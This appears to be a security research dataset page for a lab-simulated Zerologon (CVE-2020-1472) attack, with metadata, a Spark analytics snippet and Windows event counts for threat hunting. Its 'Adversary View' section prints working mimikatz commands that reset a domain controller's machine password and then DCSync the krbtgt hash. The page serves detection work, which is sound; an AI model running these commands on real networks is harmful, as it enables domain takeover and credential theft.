Mimikatz Netlogon Unauthenticated NetrServerAuthenticate2¶
Metadata¶
Author |
Roberto Rodriguez @Cyb3rWard0g |
Creation Date |
2020/09/16 |
Modification Date |
2020/09/16 |
Tactics |
[‘TA0008’] |
Techniques |
[‘T1210’] |
Tags |
[‘CVE-2020-1472’, ‘Password Update’, ‘Netlogon Insecure AES-CFB8’] |
Dataset Description¶
This dataset represents adversaries leveraging a vulnerability (CVE-2020-1472) in a cryptographic authentication scheme used by the Netlogon Remote Protocol, which among other things can be used to update computer passwords. This vulnerability was discovered by @@SecuraBV.
Datasets Downloads¶
Dataset Type |
Link |
---|---|
Host |
|
Network |
Simulation Plan¶
Environment |
Tool Type |
Module |
---|---|---|
Mordor shire |
C2 |
|
Mordor shire |
tool |
|
Mordor shire |
tool |
Adversary View¶
Mimikatz Implementation (NetrServerAuthenticate2)
=================================================
(wardog) > ShellCmd /shellcommand:"C:\Users\pgustavo\Downloads\mimikatz_trunk\x64\mimikatz.exe \"lsadump::zerologon /target:MORDORDC.theshire.local /account:MORDORDC$ /exploit\" exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 16 2020 12:02:22
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
mimikatz(commandline) # lsadump::zerologon /target:MORDORDC.theshire.local /account:MORDORDC$ /exploit
Target : MORDORDC.theshire.local
Account: MORDORDC$
Type : 6 (Server)
Mode : exploit
Trying to 'authenticate'...
====================================================
NetrServerAuthenticate2: 0x00000000
NetrServerPasswordSet2 : 0x00000000
* Authentication: OK -- vulnerable
* Set password : OK -- may be unstable
mimikatz(commandline) # exit
Bye!
DCSync Follow-up (Optional)
(wardog) > ShellCmd /shellcommand:"C:\Users\pgustavo\Downloads\mimikatz_trunk\x64\mimikatz.exe \"lsadump::dcsync /domain:theshire.local /dc:MORDORDC.theshire.local /user:krbtgt /authuser:MORDORDC$ /authdomain:theshire /authpassword:\\"\\" /authntlm\" exit"
Explore Mordor Dataset¶
Initialize Analytics Engine¶
from openhunt.mordorutils import *
spark = get_spark()
Download & Process Mordor File¶
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/mimikatz_CVE-2020-1472_Unauthenticated_NetrServerAuthenticate2.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
Get to know your data¶
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+------------------------------------+-------+-----+
|Hostname |Channel |EventID|count|
+---------------------------+------------------------------------+-------+-----+
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|7 |102 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|12 |99 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|10 |88 |
|WORKSTATION6.theshire.local|Security |4658 |64 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|13 |59 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational|10 |50 |
|WORKSTATION6.theshire.local|Security |4656 |32 |
|WORKSTATION6.theshire.local|Security |4690 |32 |
|WORKSTATION6.theshire.local|Security |4663 |32 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational|7 |25 |
|MORDORDC.theshire.local |Security |5156 |21 |
|WORKSTATION5.theshire.local|Security |5158 |20 |
|MORDORDC.theshire.local |Security |5158 |16 |
|WORKSTATION5.theshire.local|Security |5156 |16 |
|WORKSTATION6.theshire.local|Security |5156 |15 |
|WORKSTATION6.theshire.local|Security |5158 |15 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational|3 |9 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational|12 |7 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational|11 |6 |
|WORKSTATION5.theshire.local|Security |4658 |6 |
+---------------------------+------------------------------------+-------+-----+
only showing top 20 rows